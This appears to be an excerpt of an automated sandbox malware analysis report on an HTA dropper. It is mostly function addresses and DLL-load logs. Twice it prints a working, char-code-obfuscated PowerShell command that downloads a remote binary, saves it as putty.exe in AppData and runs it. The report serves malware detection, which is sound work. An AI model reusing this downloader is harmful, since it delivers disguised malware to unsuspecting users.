Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A55B903_2_00007FF738A55B90
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A70CA03_2_00007FF738A70CA0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A3CF203_2_00007FF738A3CF20
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A352A73_2_00007FF738A352A7
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A522203_2_00007FF738A52220
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A563C03_2_00007FF738A563C0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A794F03_2_00007FF738A794F0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A649B03_2_00007FF738A649B0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A759B03_2_00007FF738A759B0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AF49843_2_00007FF738AF4984
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AAD9803_2_00007FF738AAD980
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AA4AA03_2_00007FF738AA4AA0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738B0CAC83_2_00007FF738B0CAC8
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738B03AD83_2_00007FF738B03AD8
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AABA203_2_00007FF738AABA20
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A71A703_2_00007FF738A71A70
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AF1BC43_2_00007FF738AF1BC4
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A3FBB03_2_00007FF738A3FBB0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A43B403_2_00007FF738A43B40
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A59B203_2_00007FF738A59B20
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738B14B4C3_2_00007FF738B14B4C
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AEECC43_2_00007FF738AEECC4
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A52CC03_2_00007FF738A52CC0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A6BC403_2_00007FF738A6BC40
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AACC903_2_00007FF738AACC90
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A42C803_2_00007FF738A42C80
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AA6C703_2_00007FF738AA6C70
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A39C703_2_00007FF738A39C70
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738B03DC03_2_00007FF738B03DC0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A60E103_2_00007FF738A60E10
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A4CDE03_2_00007FF738A4CDE0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A45D1A3_2_00007FF738A45D1A
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A57D6D3_2_00007FF738A57D6D
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AEEEB03_2_00007FF738AEEEB0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A68EB03_2_00007FF738A68EB0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A57F033_2_00007FF738A57F03
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A31EF03_2_00007FF738A31EF0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A3DEE03_2_00007FF738A3DEE0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AECE3C3_2_00007FF738AECE3C
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A3BE203_2_00007FF738A3BE20
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AA6FD03_2_00007FF738AA6FD0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AA40103_2_00007FF738AA4010
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A6B0003_2_00007FF738A6B000
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AA8F903_2_00007FF738AA8F90
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AF6F883_2_00007FF738AF6F88
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A450BA3_2_00007FF738A450BA
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AF20BC3_2_00007FF738AF20BC
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AEF09C3_2_00007FF738AEF09C
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A380903_2_00007FF738A38090
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A410703_2_00007FF738A41070
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A311CC3_2_00007FF738A311CC
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A5A1D03_2_00007FF738A5A1D0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738B041B83_2_00007FF738B041B8
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A741B03_2_00007FF738A741B0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A541A03_2_00007FF738A541A0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A4B1403_2_00007FF738A4B140
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AFE1243_2_00007FF738AFE124
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A3A1203_2_00007FF738A3A120
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A531803_2_00007FF738A53180
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A311603_2_00007FF738A31160
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A6B2F03_2_00007FF738A6B2F0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A8C2503_2_00007FF738A8C250
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A802403_2_00007FF738A80240
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AEE21C3_2_00007FF738AEE21C
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AEF2883_2_00007FF738AEF288
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A732803_2_00007FF738A73280
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AAA2703_2_00007FF738AAA270
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AB12603_2_00007FF738AB1260
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AED3D43_2_00007FF738AED3D4
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AFA3D03_2_00007FF738AFA3D0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A763D03_2_00007FF738A763D0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A673B03_2_00007FF738A673B0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AB04003_2_00007FF738AB0400
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A3A3563_2_00007FF738A3A356
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A3A37A3_2_00007FF738A3A37A
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A363803_2_00007FF738A36380
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A3A36E3_2_00007FF738A3A36E
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A444D03_2_00007FF738A444D0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AF54E43_2_00007FF738AF54E4
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738B174383_2_00007FF738B17438
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AEF4703_2_00007FF738AEF470
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AAE5B03_2_00007FF738AAE5B0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AA85803_2_00007FF738AA8580
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AAD5603_2_00007FF738AAD560
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A5E6D03_2_00007FF738A5E6D0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AF16C03_2_00007FF738AF16C0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A3F6B03_2_00007FF738A3F6B0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A377103_2_00007FF738A37710
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738B0E6343_2_00007FF738B0E634
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A816603_2_00007FF738A81660
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738AEF6583_2_00007FF738AEF658
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738B097F83_2_00007FF738B097F8
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A450BA3_2_00007FF738A450BA
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A867F03_2_00007FF738A867F0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A697E03_2_00007FF738A697E0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738B107643_2_00007FF738B10764
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A3D7403_2_00007FF738A3D740
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A397303_2_00007FF738A39730
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A467873_2_00007FF738A46787
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A418A03_2_00007FF738A418A0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A389003_2_00007FF738A38900
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A4E8503_2_00007FF738A4E850
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A738203_2_00007FF738A73820
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00007FF738B01618 appears 33 times
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00007FF738AFA0EC appears 402 times
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00007FF738A83B20 appears 63 times
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00007FF738AFE580 appears 57 times
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00007FF738A6EA20 appears 95 times
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00007FF738AA6C00 appears 43 times
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: String function: 00007FF738A82B20 appears 66 times
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: Process Memory Space: powershell.exe PID: 7496, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal68.evad.winHTA@6/4@1/1
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A74050 FormatMessageA,GetLastError,3_2_00007FF738A74050
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A5A1D0 CoCreateInstance,CoCreateInstance,CoCreateInstance,CoCreateInstance,CoCreateInstance,3_2_00007FF738A5A1D0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 3_2_00007FF738A3D570 GetProcAddress,FreeLibrary,FindResourceA,SizeofResource,LoadResource,LockResource,3_2_00007FF738A3D570
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\putty.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_he4r4m0m.byu.ps1Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: qwertyuiopasdfghjklzxcvbnm.htaVirustotal: Detection: 11%
Source: putty.exeString found in binary or memory: config-ssh-portfwd-address-family
Source: putty.exeString found in binary or memory: config-address-family
Source: putty.exeString found in binary or memory: config-serial-stopbits
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\qwertyuiopasdfghjklzxcvbnm.hta"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe "C:\Users\user\AppData\Roaming\putty.exe"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ;Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe "C:\Users\user\AppData\Roaming\putty.exe" Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: wintypes.dllJump to behavior
